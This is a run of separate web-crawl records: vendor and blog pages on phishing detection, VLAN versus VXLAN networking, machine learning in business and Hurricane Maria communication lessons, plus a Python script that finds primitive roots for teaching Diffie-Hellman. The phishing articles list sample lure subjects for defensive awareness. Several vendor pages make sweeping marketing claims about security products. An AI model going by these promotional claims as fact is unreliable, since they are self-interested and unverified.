At Hideez, we have created a cost-effective universal security key that is robust and reliable enough to protect against a variety of attacks. Our Hideez Key 4 can protect you against phishing attacks, MITM attacks, spoofing, and any other type of password-related threat.
Best of all, it doesn’t break the bank, so it’s an approachable solution for small businesses and individual users. For just $49, you will get a complete security solution, combining both hardware and software components. This includes a hardware password manager with an autofill feature, a strong password generator, a security key supporting FIDO/U2F standards, and an RFID key fob.
Knowing the many cybersecurity threats that exist in today’s landscape, you shouldn’t leave your security up to chance. Reach out to us now to request a free trial for enterprises! | <urn:uuid:8396306a-c16e-4757-93cb-8723a6910ba0> | CC-MAIN-2024-38 | https://hideez.com/en-ca/blogs/news/phishing-explained | 2024-09-16T19:12:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.949553 | 2,031 | 3.578125 | 4 |
Criminals use phishing, a type of online scam, to impersonate legitimate companies to steal sensitive information. Why is this scam referred to as phishing? The term “phishing” is a spin on the word fishing because criminals dangle a fake “lure”— that looks legitimate and is sent from a reputable company—hoping to get users to “bite” by providing sensitive information like account numbers, passwords, usernames, and credit card numbers. The attacker tricks the recipient into entering information in response to their message or on a website designed to steal or sell his or her data. This is often not an attack to target a specific individual and can therefore be conducted en masse.
Phishing is the most common way in which cybercriminals attack businesses. In fact, phishing rose 61 percent in the past year to more than one million attacks.
The impact of an attack
A successful phishing attack can result in many different consequences and can impact an organization’s finances and reputation including:
- Business disruption: An attack can lead to a company’s customers’ inability to access online services and employees’ unable to work. This often results in a loss of customers and productivity.
- Loss of data: Scammers use phishing to install malicious software on a user’s device. Once infected, they have access to files and gain the ability to track the user’s digital movements.
- Monetary theft: Financial theft occurs when cybercriminals steal an organization’s money, equipment, and/or intellectual property. Another form of monetary theft is using extortion and payment demands in return for the release of sensitive data and information.
- Damaged reputation: Data breaches cause damage to a company’s reputation due to a loss of public trust and the resulting negative impact on its brand.
Types of email phishing attacks
Most phishing attacks are sent by email. 3.4 billion fake emails are sent each day resulting in over a trillion annually. The following are some of the most common types of email phishing attacks:
- Attachments: Most organizations’ email filters scan for known phishing URLs in the body of the email. To get around this, phishing emails that contain a malicious attachment infected with viruses and other malware are common. The attachment is often disguised as an invoice, delivery note, or some other lure designed to get the recipient to open it.
- Links: The more links an email includes, the less likely the user is to check every link. Therefore, cybercriminals hide malicious links in email text and/or signature blocks. Scammers also make the body of an email look like text but in actuality, it’s a clickable image hosted on a fake phishing site.
- Spoofing: When a scammer disguises a phishing attack by tricking the recipient into thinking the message came from a person or entity they know and trust—a colleague, vendor, or business—it’s referred to as spoofing. These emails often include a call to action that’s convincing enough to get the email user to take the action requested.
Related: Types of Phishing
To detect a phishing email, look for the following signs:
- A sense of urgency: An unusually assertive email subject line and/or body text that conveys a sense of urgency can signal fraud. Scammers are trying to instill a false sense of urgency to trick you into acting quickly without carefully reviewing the email. Always be suspicious of emails that claim you must click on a hyperlink or open an attachment immediately.
- Mismatched email domains: If the email claims to be from a reputable person or company but the email is sent from another email domain like Gmail.com, it may be a phishing attempt.
Check that the ‘from’ email address matches the display name and that the ‘reply to’ header matches the source.
- Unanticipated or unusual attachments: If you receive an unexpected or suspicious email attachment that is not relevant to the work you are doing, never open it. When in doubt, call the sender to verify the email and attachment.
- Use of hyperlinks: Always hover over an email hyperlink before clicking it to see the URL and verify its legitimacy. If the link misdirects you or links to an IP address or a foreign domain, it’s more than likely not legitimate and could be malicious.
Related: Indicators of Phishing
Protect your organization’s emails
78 percent of email users understand the risks of hyperlinks in emails but still click them anyway and 97 percent are unable to recognize a sophisticated phishing email. A multi-layered security approach can improve your organization’s resilience against phishing and minimize any disruption that does occur from a successful attack.
Lume’s cybersecurity services feature a layered approach to protection and responsiveness: endpoint protection, DNS protection, and cybersecurity training. Pick and choose a standalone product or bundle it with other services to implement the most holistic cybersecurity solution. Contact us for more information.
Related: Beware of Phishing Scams
This blog was written by Lume Strategies Director of Professional Services Michael Hensley. | <urn:uuid:95299c70-a835-4c9d-9dc7-4ffd14bffd50> | CC-MAIN-2024-38 | https://lumestrategies.com/blog/identifying-and-preventing-email-phishing-attacks/ | 2024-09-16T19:04:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.934238 | 1,084 | 3.578125 | 4 |
Data is the heart of AI. So, of course we need to have a podcast about data! In this episode of the AI Today podcast hosts Kathleen Walch and Ron Schmelzer define the terms Data, Dataset, Big Data, DIKUW Pyramid.
Data is the basic unit of discrete values that convey meaning, facts, quantities, or other units that computers operate on for further processing, interpretation, and analysis. Big data is what’s helping power this latest wave of AI. Big data is an umbrella term used for data of significant size, complexity, variable format, variable quality, and frequency of change. It presents challenges for storage, processing, analysis, integration, and usage at required levels of detail, speed, and accuracy. In this podcast we review these terms in greater detail.
And we talk about the DIKUW peyramid a lot, especially in CPMAI certification, because it’s a great visual representation of the increasing value that can be derived from a base of Data. The DIKUW pyramid shows increasing value from Data, Information, Knowledge, Understanding, to Wisdom and different aspects that organizations require as they seek greater value. In this episode, we explain how these terms relate to AI and why it’s important to know about them.
- FREE Intro to CPMAI mini course
- CPMAI Training and Certification
- What is the Certified Professional in AI Project Management (CPMAI) Certification?
- AI Glossary
- AI Glossary Series – DevOps, Machine Learning Operations (ML Ops)
- AI Glossary Series – Automated Machine Learning (AutoML)
- AI Glossary Series – Data Preparation, Data Cleaning, Data Splitting, Data Multiplication, Data Transformation
- AI Glossary Series – Data Augmentation, Data Labeling, Bounding box, Sensor fusion | <urn:uuid:551311bb-197b-42d6-9273-36cf9b1ec77f> | CC-MAIN-2024-38 | https://www.cognilytica.com/ai-today-podcast-ai-glossary-series-data-dataset-big-data-dikuw-pyramid/ | 2024-09-16T18:38:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.853064 | 387 | 2.875 | 3 |
Contingency Communication improves Community Resilience
On September 20, 2017 Hurricane Maria made landfall in Puerto Rico as a Category 4 storm. Hurricane Maria severely damaged or destroyed a significant portion of the regions already fragile infrastructure. Following landfall, 95 percent of cell towers were out of service, and outages continued in the ensuing months, severely testing community resilience.
This article is based on the 2017 Hurricane Season Federal Emergency Management Agency (FEMA) After-Action Report and provides a summary of the lessons learned from Hurricane Maria to help improve community preparedness.
Federal Emergency Management Agency (FEMA)
FEMA’s mission is to lead America to prepare for, prevent, respond to and recover from disasters with a vision of “A Nation Prepared.” FEMA can trace its beginnings back to 1803 to a Congressional Act which is generally considered the first piece of disaster legislation.
As the 2017 hurricanes demonstrated, the impacts of long-term infrastructure outages jeopardize the ability and speed of communities and individuals to recover, and can have dire economic and social consequences.
Communication and Community Resilience
Resiliency is particularly important for lifelines such as communications. Every day, individuals, organizations, and government institutions provide critical services that depend on reliable access to communications systems.
In the immediate aftermath of Hurricane Maria, communication outages caused the following issues:
- Impeded field personnel access to key operating and management systems
- Lack of training on how to prioritize use so as not to overload contingency systems (e.g. satellite)
- Reduced ability of disaster survivors to register for FEMA assistance
- Delayed Resource Requests
- Some FEMA satellite phones could not correctly operate in the Caribbean
- Many staff who received satellite phones did not know how to properly use them
- Demand for satellite phones exceeded supply, which produced procurement and logistical challenges
In the absence of mobile communications, the teams used paper registrations and forms on offline laptops and tablets. These new, non-standard processes caused inaccuracies and omissions, delaying the provision of benefits to survivors.
FEMA staff used handwritten resource requests and subsequently had to review, prioritize, sign, scan, and manually enter more than 2,000 requests into FEMA’s crisis management system, further contributing to delays.
FEMA also experienced shortfalls incorporating the Integrated Public Alert and Warning System into the response, and could have better prioritized the transportation and use of contingency communications equipment, and trained personnel.
Contingency Communication Methods
- Mobile satellite
- Mobile radio
- Logistics support services to provide command and control communications, situational awareness, and program delivery
- Satellite phones (procured and leased satellite devices)
- “Health brigades” of local volunteers knocked on doors to identify and assist those who could not leave
Following is a summary of recommendations for Communication Providers from the 2017 Hurricane Season FEMA After-Action Report:
- Communication providers should work with government to address interdependencies and cascading impacts among critical lifelines and cross-sector coordination
- Arrange combined training exercises with government departments on how to use satellite phones and other emergency communications
- Provide training on how to prioritize use to preserve contingency systems
- Invest in redundant assets to maintain communication
- Invest in more resilient infrastructure
- These investments, including pre-disaster mitigation, will not only reduce disaster costs but also can have life-saving impacts during incidents
- Adopt modern building codes and where necessary upgrade or relocate premises
- Include continuity and resilient all-hazards communications capabilities in plans and guidance
- Ensure staff are regularly trained on how to use the contingency communication resources
Maintaining effective communication following a catastrophic incident is crucial to the recovery of affected communities. Taking the above measures and having a contingency communication plan will provide a boost to community resilience.
Based on the 2017 Hurricane Season FEMA After-Action Report – July 12, 2018
This article has also been published by Comms Risk
If you want to increase your organization’s chances of surviving a major disaster, start planning today with BCP Builder’s Online Business Continuity Plan Template. | <urn:uuid:6fef621a-b82b-4310-938e-c21d43c67d83> | CC-MAIN-2024-38 | https://www.bcpbuilder.com/contingency-communication-following-catastrophic-failure/ | 2024-09-18T02:24:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00177.warc.gz | en | 0.929511 | 844 | 2.859375 | 3 |
With the widespread adoption of cloud technology, data centers play a huge role in running key applications and business processes for organizations around the world. In 2022, the IT spending on data centers is expected to be $227 billion, and $237 billion by 2023.
To run these datacenters profitably and deliver quality service to their customers, organizations are constantly trying to squeeze out maximum performance from the hardware. Two technologies, VLANs or Virtual Local Area Networks and VXLANS or Virtual eXtensible Local Area Networks improve network efficiency and contribute to improved security. In this article, we explore what they are, how they work, and the differences in VXLAN vs VLAN.
What is VLAN?
VLAN standards for Virtual LAN or Virtual Local Area Network. VLANs essentially create virtual networks within a local area network and let you group together devices logically. For example, in a LAN in an office or a school, all devices come under one network, with a switch (usually) connecting them. And all of these devices come under one broadcast domain, and maybe even under a single collision domain.
This presents a couple of problems. The packets from different devices may collide, and they’ll have to send again, creating network inefficiencies. This can be avoided by using multiple switches, but it still keeps the devices under the same broadcast domain. The network efficiency decreases further as the number of devices increases.
With a VLAN, you can create multiple networks and broadcast domains of smaller sizes. And you can use these virtual LANs for grouping together devices that frequently communicate with each other. For example, instead of connecting all devices in an office under a single broadcast domain or a single LAN, you can create virtual LANs for the finance department, the HR department, and the marketing department.
How do VLANs work?
They work by creating multiple virtual switches over a single physical switch, with each virtual switch handling the communication for a single VLAN. You can configure individual ports on a physical switch to handle communication only for a single VLAN.
And you can connect these virtual switches to other virtual switches in the same virtual LAN, even if they are on another physical switch.
As you can imagine, this is not scalable; for every VLAN, you’ll need a physical connection between the physical switches. For example, let's say there are three VLANs and two switches involved. To connect the virtual switches on these three VLANS, you’ll need three physical connections. And there are only so many ports on a physical switch.
To solve this, a method was devised to connect multiple switches over a single link called trunk ports. Here, data packets for a single port would be carried over a single port on each physical switch.
As we know, every data packet contains a layer 3 header with destination and source IP address, and a layer 2 header containing the MAC addresses. When data is sent over this trunk port, the information about the VLAN it belongs to is added to the layer 2 header. This tag is called the VID or VLAN ID which identifies the VLAN to which each frame belongs to. This ensures that the data packets in a single VLAN reach only the devices in that virtual LAN.
The VID is a 12-bit field that can create 4096 IDs. But 0 and 4095 are reserved, which means you can have up to 4094 VLANs in a single network.
What is VXLAN?
VXLAN or Virtual eXtensible Local Area Network is a tunneling protocol that carries layer 2 packets over a layer 3 network, that is ethernet over IP.
The need for VXLANs came from the limitations of VLAN, as well as the arrival of server virtualization. Due to its 12 bit identifier, you can only have up to 4094 virtual networks with VLAN. Meanwhile, with VXLAN, a 24-bit identifier — called VXLAN network identifier — is used, with which you can have around 16 million VXLANs.
With server virtualization, each physical server can have multiple virtual servers with its own IP address and operating systems. Different customers or clients may use these virtual servers or virtual machines and to effectively maintain these servers, maintain service continuity, and manage resources efficiently, you need dynamic VM migration. That is, in a data center, you should be able to move virtual machines from one physical server to another without affecting the user.
And for this to happen, the IP address must remain unchanged. So we can only make these changes within the data link layer and due to the constraints with the VID, you can only create a limited number of VLANs.
How VXLAN works
VXLAN creates layer 2 networks that span across layer 3 infrastructure, that is it, ethernet over IP. The ethernet layer works as an overlay network, and IP works as the underlay network. Here, a layer 2 ethernet frame is encapsulated into a VXLAN packet by adding a VXLAN header and a UDP header by a VTEP or a VXLAN Tunnel End Point. The VXLAN header consists of the VXLAN Network Identifier, which identifies the tenant or the virtual server or essentially the specific VXLAN.
The frames from the source server encapsulated by a VTEP are received across the tunnel by another VTEP which decapsulates it and sends it to the destination server. VTEPs can either be a physical device or it could be software deployed on a server.
VLAN vs. VXLAN: What are the differences?
It's time to oppose VLAN vs. VXLAN to take a closer look at their differences. First of all, while VXLANs were developed to overcome the limitations of VLANs, their applications are different, and sometimes VLAN isn’t even mentioned when you’re discussing VXLAN. That said, here are the main differences between VXLAN and VLAN.
VLAN has a 12-bit identifier called VID while VXLAN has a 24-bit identifier called VID network identifier. This means that with VLAN you can create only 4094 networks over ethernet, while with VXLAN, you can create up to 16 million. In terms of the overall infrastructure, you can further isolate networks and improve their efficiency.
In VLAN, a layer 2 network is divided into subnetworks using virtual switches and creating multiple broadcast domains within a single LAN network. In VXLAN, a layer 2 network is overlaid on an IP underlay, and the layer 2 ethernet frame is encapsulated in a UDP packet and sent over a VXLAN tunnel.
VLAN is often used by large businesses to better group devices for improved network performance and security. VLAN does network segmentation just like VXLAN, but its mainly used in data centers for dynamic migration.
Another difference is that VLAN uses the tree spanning protocol, which means half the ports are blocked for use while you can use all the ports in the case of VXLAN, further improving efficiency.
What are the advantages of VLANs?
- Improved security: VLANs let you create more networks with fewer devices. With this, you can segment and group your devices and prevent unauthorized access. Network managers can detect any security issues, set up firewalls, and restrict access to these individual networks. For example, you can keep sensitive data under a private VLAN while opening up a separate VLAN for public use. And even within an organization, segmenting the devices improves security.
- Improved performance: When all the devices are receiving all the messages, it creates congestion over the network. It reduces the bandwidth for communication. With VLAN, you can group together devices that communicate frequently, reduce the broadcast domain, and keep the bandwidth clear. Small broadcast domains are also easy to handle.
- Improved network flexibility: With VLAN, you’re not limited by the physical location of the devices. You can group devices based on their function or the department it belongs to, instead of their physical location. If employees switch to a different location in the company, they can still connect to the same VLAN to work.
- Reduced cost: Switches can usually only reduce the collision domain; you need routers to reduce the broadcast domain, which tends to be expensive. With VLANs, you can segment the network in multiple broadcast domains at a low cost.
- Simplified IT management: For the IT department, small networks with less number of devices are easier to manage and troubleshoot instead of a single large network. They provide more granular control over the networks; depending on the specific use case, you can configure the security for these individual networks.
What are the advantages of VXLANs?
- Improved scalability: Compared to VLAN, VXLAN is highly scalable, allowing 16 million isolated networks. This makes it easy to scale and highly useful in data centers, letting them accommodate more tenants.
- Supports dynamic VN migration: This is very important for continuity of services and efficient utilization of resources in a data center. This lets managers upgrade or maintain servers by shifting the VMs to another server without interrupting the services or the user knowing about it. If businesses want to add redundant servers at a different geographical location, they can manage the VMs using VXLANs. It keeps the data center robust and reliable.
- VXLAN can be easily configured and managed: VXLAN is a software-defined network (even though vendors have developed ASICs for VXLANs), and works as an overlay over an underlying IP network. This means the network can be managed and monitored with a centralized controller.
Being an overlay network brings a lot of additional advantages for VXLAN.
VXLAN: overlay over an underlying IP network
As we discussed earlier, VXLAN is a layer 2 virtual network over a layer 3 IP network. This is possible due to the encapsulation and decapsulation process; at the edges, the layer-2 frames are encapsulated into layer 3 packets which are then routed through the IP network.
This means that the overlay and the physical IP network are decoupled and you can make changes to either network without making any changes to the other. This doesn’t mean there won’t be any impact, if the underlying network can’t handle the traffic, it will affect the performance of the overlay network.
Another benefit is that the possibility of duplicate causing a problem is greatly reduced. With multiple VMs is that if two VMs have the same MAC address, it can create networking problems as the switches won’t know where to send the data packets. But a VXLAN can have duplicate MAC addresses without a problem as long as they’re in a different VXLAN segment.
The decoupled physical and virtual layers also mean tenants are not limited by the IP addresses or broadcast domains of the underlying IP network when planning their virtual networks.
In the MAC Address Table, a switch has to store the MAC Addresses of all the devices it is connected to and keep them updated. This means the more devices they’re connected to the more memory it needs and the higher the cost. With this overlay network, not all devices have to identify the MAC addresses of the VMs and the switch has to learn less number of MAC addresses.
How to deploy VXLAN? Three different methods
The different methods of deploying are more or less where the VTEP is located, whether it's in software or hardware.
1. Host-based VXLAN
As the name suggests, here the VXLAN runs on the host. In this case, a virtual switch acts as a VTEP encapsulating and decapsulating the data packets — and is also referred to as a software VTEP.
The virtual switch encapsulates the data before it goes to the physical network, and is only decapsulated at the destination VTEP. These VTEPs can even be inside hypervisor hosts. And because of this, there’s only IP traffic in the physical network.
2. Gateway-based VXLAN
In a gateway-based VXLAN or a hardware VXLAN, the VTEP is within a switch or a router. These devices will then be referred to as VXLAN gateways.
Here, the switches encapsulate and decapsulate the data packets and create tunnels with other VTEPs. The traffic from the hosts to the gateways will be layer 2, while the rest of the network will see only IP traffic.
3. Hybrid VXLAN
In a hybrid implementation, some of the VTEPs are on hardware while some are on hosts in virtual switches. Here, the traffic flows from the source VTEP to the destination VTEP and either of them may be hardware or software.
Frequently asked questions
What exactly is a VLAN?
VLAN or Virtual Local Area Network creates multiple smaller broadcast domains over a single Ethernet network. They are used to logically group together devices and improve network efficiency and security.
What exactly is VXLAN?
VXLAN or Virtually eXtensible Local Area Networks overlay a layer 2 network on an underlying layer 3 IP network. They’re used for large-scale segmentation and isolation and handle multiple VMs in data centers. | <urn:uuid:160e417b-7723-46af-96a1-463ff1439a1b> | CC-MAIN-2024-38 | https://blog.invgate.com/vxlan-vs-vlan | 2024-09-10T17:05:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00877.warc.gz | en | 0.920884 | 2,769 | 3.09375 | 3 |
Automation is the key to success; every company is expanding on this domain’s expertise, as organizations take on a more global approach. Given the problems of decision making, learning, and the need for adaptability when understanding data, data scientists introduced the concept of Machine Learning within the realm of Artificial Intelligence. These practices have been able to bring about a radical change in modern business efficiency.
Artificial Intelligence is commonly a platform which performs tasks intelligently, without incurring the need for human intervention. On the other hand, Machine Learning is an exclusive part of the Artificial Intelligence world, which encapsulates the know-how and the logic behind making the concept of Artificial Intelligence a real success story. Through the use of Machine Learning, machines can be taught to work more sensibly, thereby allowing them to recognize different patterns and understand new circumstances with ease.
Machine Learning has come to be used extensively, especially when it comes to providing analytical solutions to the world of consumers and technology. Through large systems of data, Machine Learning has been able to drive solutions, which help create a more data-driven approach towards solving problems.
How Artificial Intelligence is Changing Enterprise Applications
Corporate enterprises are showing a growing interest in the field of Artificial Intelligence and Machine Learning. From IBM’s Watson to Google’s DeepMind to AWS’s multiple Artificial Intelligence services, there is a lot of activity happening in the market these days.
Other features of Machine Learning include the likes of Deep Learning, computer vision and natural language processing (NLP). With all these innovations languages in place, computers can enhance their functionalities, including pattern recognition, forecasts, and analytical decision-making.
By incorporating Artificial Intelligence and Machine Learning techniques in day to day functions, large enterprises can automate everyday tasks and enhance their overall efficiency in the long run.
Here are some ways in which Machine Learning techniques are helping enterprises enhance their efficiency:
Improving Fraud Detection: Fraud detection has become the need of the hour, as more and more companies are investing heavily in these new capabilities. With more companies falling prey to fraudulent practices, there is an imminent need to be ahead in the game of fraud detection. With Artificial Intelligence and Machine Learning in place, companies and organizations can extensively direct their resources towards enriching their fraud prevention activities, to help isolate potential fraud activities.
Loss Prediction and Profit Maximization: When it comes to deriving insights from heaps of data, there is nothing better than Machine Learning to prevent loss prediction and maximize profits. The stronger the techniques, the more foolproof the loss prediction methodologies would become in the long run.
Personalized Banking: In this era of digitization, everything is automated. For this reason, banks often seek to deliver customized, top notch, personalized experiences to their customers to keep loyalty intact. By leveraging their data, banks can aim to unearth customer needs and fulfill them with the utmost precision and dedication.
Robotic Financial Advisors: Portfolio management has become the talk of the town these days, especially since robotic financial advisors have stepped into the game. Clients can benefit immensely by this advancement, since the right opportunities are mapped with their portfolio needs and demands. Robotic applications are easy to merge with services such as Alexa and Cortana, allowing banks to provide exceptional service to their customers. Through this integration, financial institutions can hope to acquire new customers and also offer more individualized services to existing customers.
Next-Era Digital Traveling: Through the use of recommendation engines, travelers can experience the new recommendations for their travel aspirations. Organizations can play a role by allowing customers to converse with chatbots, which are created through the use of Artificial Intelligence and Machine Learning. As predicted by Gartner, by the year 2020, 25% of all customer service operations will rely on virtual assistant technology to make their business ends meet.
Detailed Maintenance: Through the help of predictive maintenance, industries like aviation, transportation, and manufacturing are expecting to be able to provide the best customer service in the market. Through the use of predictive models, such industries can accurately forecast prices and predict their losses, thereby, reducing any redundancies in the future.
With digitization paving the path of the future, there is a bright scope for companies and organizations which are investing heavily in these new age technologies of Machine Learning and Artificial Intelligence. Third party consulting services such as Idexcel are ready to help companies looking to take their first step with industry leading consulting and cloud-advisory services.
As we progress through the years, it will be interesting to watch the changes across industries, as every sector aims to provide exceptional service to its customers in multiple ways.
How Your Small Business can Benefit from Machine Learning
Machine Learning’s Impact on Cloud Computing
Amazon SageMaker in Machine Learning
The Future of Data Science Lies within Cloud-Based Machine Learning and Artificial Intelligence
Mostly because of their importance in some types of asymmetric cryptography (Diffie-Hellman, RSA) I have a fascination with prime numbers. I enjoy occasionally checking on the latest discovery of ever larger prime numbers. As I write the largest known prime has more than 17,425,170 digits in it. That's a big-ass number! Many years ago I wanted to get a blanket made that had the largest prime printed on it. Geek stuff, I know.
One of the important components of a Diffie-Hellman key exchange is the use of a primitive root for a given prime number. I know what a primitive root is but if I try to explain it here I’ll just make mathematicians angry. I’ll direct you instead to Wikipedia’s discussion of primitive roots and ask that you read, at the very least, the first sentence of the article. If you want to watch some really awesome videos on modern cryptography that will briefly discuss what a primitive root is (and why it’s important) check out this video discussing the discrete logarithm problem on the Khan Academy website. You should watch the whole series on the Khan Academy website; it is excellent (do a Google search for “Journey Into Cryptography“).
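To make the definition concrete, here is a quick toy illustration of my own, using Python's built-in three-argument pow for modular exponentiation:

# 3 is a primitive root of the prime 7: its successive powers mod 7
# hit every nonzero residue exactly once.
>>> [pow(3, k, 7) for k in range(1, 7)]
[3, 2, 6, 4, 5, 1]
# 2 is not a primitive root of 7: its powers cycle through only 3 of the 6 residues.
>>> [pow(2, k, 7) for k in range(1, 7)]
[2, 4, 1, 2, 4, 1]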
In class I use a python script to illustrate the Diffie-Hellman key exchange but I always used really small primes (like 17 or 47). They work just fine but I wanted to be able to use larger numbers to further illustrate the concepts and math at work. To do that I needed to be able to figure out the primitive roots of larger prime numbers. Googling for primitive roots of primes didn’t give me a lot so I wanted to see if I could get python to help me out. The code below works (to the very best of my knowledge). I have used it for many different primes and the primitive roots generated always work in my Diffie-Hellman math examples (which I will post in an upcoming Edition)
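For reference, here is a minimal sketch of the exchange itself, using the standard textbook toy numbers (p = 23, g = 5) rather than the values from my classroom script; the primitive-root finder itself follows below.

p, g = 23, 5                 # public values: a small prime and one of its primitive roots
a, b = 6, 15                 # private keys picked by Alice and Bob
A = pow(g, a, p)             # 8, which Alice sends to Bob
B = pow(g, b, p)             # 19, which Bob sends to Alice
shared_alice = pow(B, a, p)  # 2
shared_bob = pow(A, b, p)    # 2, so both sides derive the same secret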
Here’s the Code:
# This script will generate all of the primitive roots
# for a given prime number.
prime = int(raw_input("Enter a prime number: "))
num_to_check = 0
p_minus_1_range = range(1, prime)
print "If you entered a large number (4+ digits) this could take a long time."
primitive_roots = []
for each in range(1, prime):
    num_to_check += 1
    candidate_prim_roots = []
    for i in range(1, prime):
        modulus = (num_to_check ** i) % prime
        candidate_prim_roots.append(modulus)  # collect every power of the candidate mod p
    cleanedup_candidate_prim_roots = set(candidate_prim_roots)
    # a primitive root's powers hit all of 1..p-1, so the deduplicated set has p-1 members
    if len(cleanedup_candidate_prim_roots) == len(p_minus_1_range):
        primitive_roots.append(num_to_check)
print "Primitive roots of %d are:" % prime
print primitive_roots
Note: Depending on the size of the prime you enter it could take a while to sort things out. Even though the script is pretty short there is a whole bunch of number crunching going on. In my tests on my late 2013 Macbook Pro (Intel 2.6GHz Core i7 with 16GB RAM) it took a little over 4 minutes to calculate all of the primitive roots of the prime 1907. All of the primitive roots for the prime 941 were generated in 28 seconds. Generating all of the primitive roots for the prime 5051 took an impressive 113 minutes. It’s also worth noting that the script uses a pretty big chunk of RAM (about 6GB in my generation of the primitive roots of 5051). So if you want to generate primitive roots of big primes, either be patient or get a better computer than the one I am using.
Linux and OS X users: If you want to know how long the script takes to complete, try running it with the time command (i.e. time ./primitive_root_finder.py)
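If those runtimes bother you, there is a much faster test based on a standard number-theory fact: g is a primitive root of a prime p exactly when g raised to the power (p-1)/q, taken mod p, is not 1 for every prime factor q of p-1. Here is a sketch of that approach (my own addition, written for Python 3):

def prime_factors(n):
    # naive trial division; fine for the modest sizes discussed above
    factors = set()
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors.add(d)
            n //= d
        d += 1
    if n > 1:
        factors.add(n)
    return factors

def primitive_roots_fast(prime):
    qs = prime_factors(prime - 1)
    # g is a primitive root iff none of these proper power residues collapses to 1
    return [g for g in range(1, prime)
            if all(pow(g, (prime - 1) // q, prime) != 1 for q in qs)]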
If you liked this post, please consider sharing it. Thanks!
Phishing is a broad category that can encompass many flavors of the same basic cyberattack. An estimated 90% of incidents that end in a data breach start with a phishing email. Phishing can also lead down dark roads to a host of nasty cyberattacks like business email compromise, ransomware and account takeover. However, some of the specialized versions of phishing that you may encounter do have hallmarks that can clue you in to the scam. Go behind the scenes into three nasty varieties of phishing to learn the key indicators and red flags to look for to avoid becoming the victim of one of these potentially devastating phishing attacks.
Angler Phishing (Social Media Phishing)
A phishing attack conducted through the use of social media lures, like messages telling the target that they have been tagged in a photo, direct messages on messaging apps or emails from social media site administrators.
Enticing the target to interact with a fake or spoofed login page for the requisite social media site, which the attackers then use to capture the victim's password. The cybercriminals can then perform an account takeover (ATO) and use the victim's account for fraud like business email compromise (BEC), or snoop for information on the victim's connections to help them better target sophisticated spear phishing attacks.
Angler phishing is a relatively new form of phishing that has risen to prominence over the past decade. The preferred format for a malicious message using this technique is email, but it can also be conducted through messaging. LinkedIn messages are the most effective for cybercriminals, with a 47% open rate. However, cybercriminals will imitate messages from any social network to lure in unsuspecting victims.
Some examples include:
- Recruiters are looking at your profile!
- You appeared in new searches this week!
- Please add me to your LinkedIn network
- A new photo of you has been tagged on Facebook
- Someone sent you a direct message on Twitter
- See who is looking at your profile!
- You’ve been tagged in a photo on Instagram
- Confirm my WhatsApp account
- Your TikTok Verified Badge
Employees that take the bait in social media phishing attacks can fall victim to dangerous ensuing attacks including credential compromise and business email compromise. In January 2021, organizations experienced about 34 social-media-related phishing attacks per month. However, in June this number rose closer to 50, representing a 47 percent increase through the first half of 2021. By September 2021, organizations were looking at more like 61 social-media-related phishing attacks per month – a shocking 82% increase in just three quarters.
A phishing attack featuring personalized details in the lure that add believability to increase the likelihood that the recipient will take the bait. Spear phishing is the most common type of specialized phishing attack, and can be aimed at anyone at any level within an organization. These messages can also be very tricky to spot – 97% of employees are unable to detect a sophisticated phishing message like the type used in spear phishing attacks.
To lure unwary recipients into taking an action that achieves the desired end for the bad guy like handing over credentials, sending money, allowing them access to sensitive systems and data, infecting systems with ransomware or malware or other nefarious purposes.
Cybercriminals use personalized information about their targets to craft emails that seem legitimate, often powered by information obtained from social media profiles, dark web markets and corporate websites. These lures can include:
- Emails from the recipient’s alma mater asking for updated address information.
- A message advising the victim to reset their password at a social media site.
- Free downloads from organizations to which the recipient belongs.
- Requests for donations from charities that are in the recipient’s sphere.
- Fake notifications about copyright infringement on YouTube, Tik Tok, etc.
- Attachments like brochures or notices from trusted sources like a government agency.
- Spoofed messages from the recipient’s regular service providers, suppliers or other vendors.
Spear phishing is the most common vector for business email compromise attacks, the most expensive cyberattack a business can suffer. This attack is commonly used to capture credentials, steal information, cause a data breach and deploy malware including ransomware. The open rate for spear phishing emails is about 70%. Even worse, a report by FireEye shows that 50% of recipients who open spear phishing messages click on a malicious link inside.
Whaling (CEO Fraud or Executive Phishing)
Whaling, sometimes known as CEO fraud or executive phishing, is a highly specialized spear-phishing attack that is crafted to perfectly imitate a company executive, or alternately, to fool a company executive into thinking that the message is from a trusted source.
To lure an executive or privileged employee into performing an action like supplying their credentials, giving the bad guys sensitive information or transferring money. Cybercriminals often use spoofed messages and conversation hijacking in this scenario to convince executives that they are a trustworthy business associate or a representative of an organization that the executive trusts.
Highly specific lures are crafted using personalized information about the target gathered from publicly available sources, harvested from social media sites and obtained from dark web markets and data dumps. Sometimes the cybercriminals will leverage a legitimate email account gained through BEC. These lures can include:
- Social media alerts or direct messages from sites like LinkedIn, Facebook, Twitter, What’s App, etc.
- Emails from the recipient’s bank, credit card company or a similar source
- Invoices from contractors or freelancers
- Updates from a software vendor
- Charitable donation requests
- Fake political emails from candidates or parties
- Attachments like brochures or notices from trusted sources like a government agency
- Spoofed messages from the recipient’s regular service providers, suppliers or other vendors
- Falsified event invitations
- New messages in old conversations
Whaling and CEO fraud aren’t the most frequently conducted types of phishing because each operation requires extensive research and a high level of skill in crafting and delivery. Bad actors will frequently use brand impersonation in these attacks and usually favor posing as Zoom, Amazon and DHL.
Get Affordable Email Security That Can Handle Every Phishing Threat
Graphus' AI-powered email security is a powerful defense against phishing threats like these. Compared to built-in email protection or a secure email gateway (SEG), automated, API-based email security solutions like Graphus prevent 40% more spear phishing messages from reaching an employee's inbox. Here's how:
- TrustGraph is a powerful shield between employee inboxes and malicious messages. This proprietary technology uses more than 50 distinct data points to discover sophisticated phishing messages, even zero-day attacks.
- EmployeeShield displays a bright, prominent box on suspicious messages, reminding employees to be cautious. Employees can designate a message as genuine or malicious with a single click.
- Phish911 makes it simple for employees to report any message that they don’t think is safe. When an employee reports a potentially malicious email, the message is immediately removed from everyone’s inboxes.
